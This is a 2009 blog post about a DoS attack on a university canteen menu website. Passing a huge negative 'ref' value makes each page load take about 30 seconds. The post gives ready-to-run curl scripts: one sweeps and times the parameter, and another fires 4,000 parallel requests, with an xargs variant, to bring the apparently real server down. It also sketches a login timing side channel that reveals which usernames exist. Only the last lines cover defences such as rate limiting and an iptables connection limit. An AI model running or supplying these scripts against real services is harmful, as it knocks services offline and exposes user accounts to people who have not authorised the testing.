Thursday, October 22, 2009

Abuse the load time of a Web page, for DoS & profit

At my university, we have several canteens (that's what they're called) where you can eat lunch. Each canteen publishes its menu on a common website.

You can also see what yesterday's lunch was, as well as tomorrow's. Basically, if you request tomorrow's menu, the URL will look like
http://X?ref=1
If you want yesterday's menu, you will type
http://X?ref=-1
And obviously, if you want to have the menu that was available 2 days ago, you just have to type
http://X?ref=-2
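If you want to script these baseline requests (the host is anonymized here, and I don't know the exact output format of the page), something as simple as this fetches a few offsets in a row:

# Fetch the menu for a few day offsets and save each page
# (URL anonymized as in the rest of the post).
for ref in 1 -1 -2
do
    curl -s "http://X?ref=$ref" -o "menu_$ref.html"
done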
Of course, the idea is to input a big number here and see what happens. Usually, such values are rejected by input validation. Let's have a try...
http://X?ref=-20000
This gives us the menu for Wednesday, January 19, 1955. Of course, the entry is empty, but it's fun to go back that far. Now we add one more '0':
http://X?ref=-200000
The date is now January 1st, 1970. This date should ring a bell (doesn't it?). Do we have an overflow somewhere in there? Clearly, there is an input validation issue. I also quickly tested other injection patterns, but they did not work.
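If it doesn't ring a bell: January 1st, 1970 is the Unix epoch, i.e. timestamp 0. A quick check (assuming GNU date for the -d @ syntax) shows the correspondence, which suggests the server's date arithmetic bottoms out at, or wraps around to, zero:

# Timestamp 0 is the Unix epoch.
date -u -d @0
# Thu Jan  1 00:00:00 UTC 1970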

However, we can measure the load time of the page to see whether our input affects it. To do so, I will use this small script, which only records the load time:

# Sweep ref from -1 down to about -2,000,000,000 in steps of 8,000,000
# and record each request's total load time.
for i in $(seq 1 8000000 2000000000)
do
    curl -s -w "%{time_total}\n" -o /dev/null "http://X.php?ref=-$i" >> /tmp/result.txt
done
Then, we can plot the result of the previous command.
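Any plotting tool does the job here; as an illustration, here is how I would do it with gnuplot (assuming it is installed), plotting the recorded times against the request index:

# Plot the load times collected in /tmp/result.txt.
gnuplot <<'EOF'
set terminal png
set output "/tmp/result.png"
set xlabel "request index"
set ylabel "load time (s)"
plot "/tmp/result.txt" with lines notitle
EOF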

I admit I wasn't expecting such an increase. The script probably has an internal loop that iterates over the argument we provide. If we decrease the granularity by increasing both the increment and the upper limit, this rule is confirmed, as you can see in the next plot.
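I didn't keep the exact values used for this coarser run, so the increment and upper bound below are only illustrative; the shape of the script stays the same:

# Coarser sweep: bigger step and higher upper bound (illustrative values only).
for i in $(seq 1 80000000 20000000000)
do
    curl -s -w "%{time_total}\n" -o /dev/null "http://X.php?ref=-$i" >> /tmp/result_coarse.txt
done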



This time, we start seeing some discrepancies, but the overall picture is still linear. Since we get such a nice graph, why not try with HUGE values?

curl -s -w "%{time_total}\n" -o /dev/null http://X?ref=-200000000000
30.084

The last request took 30 seconds to complete. So what's next? If it takes 30 seconds for one request, what will happen with 4,000 requests?

# Fire 4000 requests in parallel; each one keeps the server busy for ~30 seconds.
for i in {1..4000}
do
    curl -s -w "%{time_total}\n" -o /dev/null "http://X?ref=-200000000000" > /dev/null &
done

You will notice that a '&' was added at the end of the command, so that each request forks into the background. This will probably slow your own computer down dramatically, but you will eventually bring the remote machine down.
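If you don't want to spawn 4,000 background processes at once on your own machine, a variant with GNU xargs (assuming it supports -P) caps the number of concurrent curl instances:

# Run the same request 4000 times, with at most 200 curl processes in flight
# (the seq output only drives the number of runs).
seq 1 4000 | xargs -I{} -P 200 \
    curl -s -o /dev/null "http://X?ref=-200000000000"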

Actually, the load time trick has already been used in the past. Typically, you could use it to query a database: depending on how long it takes to answer, you can deduce whether a login/password pair is in the database or not (a sort of "side channel attack").
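As a sketch of that idea (the login endpoint and parameters here are purely hypothetical), you would simply compare response times for different inputs:

# Timing side channel sketch: a hypothetical login page that is slower
# when the username exists (e.g. because it actually hashes the password).
for user in alice bob mallory
do
    t=$(curl -s -w "%{time_total}" -o /dev/null "http://X/login?user=$user&pass=wrong")
    echo "$user $t"
done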

Well, once you can identify this kind of behavior (a change in processing time depending on the request), it becomes just a matter of sending enough requests before the machine runs out of resources. Here, the server is misconfigured: one should not allow so many requests from a single client in such a short time, especially when they increase resource consumption, and one should also validate the input more carefully.
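On the defensive side, even a crude per-source connection limit would blunt the parallel-request part of the attack; for example with the iptables connlimit match (shown as an illustration, not as the site's actual configuration):

# Drop new connections to port 80 from any single IP that already has
# more than 20 connections open.
iptables -A INPUT -p tcp --syn --dport 80 \
         -m connlimit --connlimit-above 20 -j DROP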
